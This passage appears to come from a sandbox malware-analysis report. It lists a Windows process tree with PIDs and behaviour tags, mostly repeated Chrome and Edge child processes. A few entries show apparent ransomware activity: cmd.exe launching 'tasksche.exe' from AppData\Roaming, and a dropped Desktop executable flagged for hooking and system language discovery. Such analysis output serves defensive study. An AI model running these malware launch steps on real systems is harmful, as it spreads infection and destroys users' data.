  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:3544

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4384

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\tasksche.exe"
1⤵
PID:1656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:5024
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:4908

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:5804

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:3452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd1f0adcf8,0x7ffd1f0add04,0x7ffd1f0add10
  2⤵
  PID:3960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=1956 /prefetch:2
  2⤵
  PID:5316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2276,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2284 /prefetch:3
  2⤵
  PID:4416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2416 /prefetch:8
  2⤵
  PID:2960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3360,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3540,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3684 /prefetch:1
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4768,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5284,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  PID:1196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5344 /prefetch:8
  2⤵
  PID:4088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5644,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:4856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=240,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4264 /prefetch:8
  2⤵
  PID:5872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3556,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  PID:5256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4808,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3748 /prefetch:8
  2⤵
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3760,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3764,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=868 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3372,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3656,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3652 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6156,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6304,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6460,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:2036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6644,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5836,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6412 /prefetch:1
  2⤵
  PID:2308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6388,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:6008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6600,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5980 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5260,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5684,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3620 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6540,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6564,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:2032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=3788,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6440 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=3628,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6536 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6172,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6160 /prefetch:8
  2⤵
  PID:2452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6612,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3684 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6176,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7088 /prefetch:1
  2⤵
  PID:3032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7300,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7448,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=6772 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7608,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7580 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7732,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7744 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7916,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7896 /prefetch:1
  2⤵
  PID:1344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=8100,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=7912 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=8048,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8236 /prefetch:1
  2⤵
  PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=8372,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8396 /prefetch:1
  2⤵
  PID:1288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=8512,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8536 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8564,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8396 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=8528,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8728 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8828,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8852 /prefetch:1
  2⤵
  PID:1288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=9036,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=8984 /prefetch:1
  2⤵
  PID:6220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=9012,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9180 /prefetch:1
  2⤵
  PID:6228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=9364,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9316 /prefetch:1
  2⤵
  PID:6340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=9396,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9496 /prefetch:1
  2⤵
  PID:6348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=9520,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9540 /prefetch:1
  2⤵
  PID:6356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=9824,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9820 /prefetch:1
  2⤵
  PID:6460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=9044,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9868 /prefetch:1
  2⤵
  PID:6468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=10112,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10136 /prefetch:1
  2⤵
  PID:6476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=10272,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10292 /prefetch:1
  2⤵
  PID:6484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=10312,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=10456 /prefetch:1
  2⤵
  PID:6492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=9056,i,2199096394673938753,12017744675245486283,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=9208 /prefetch:1
  2⤵
  PID:6568
- C:\Program Files\Google\Chrome\Application\chrome.exe
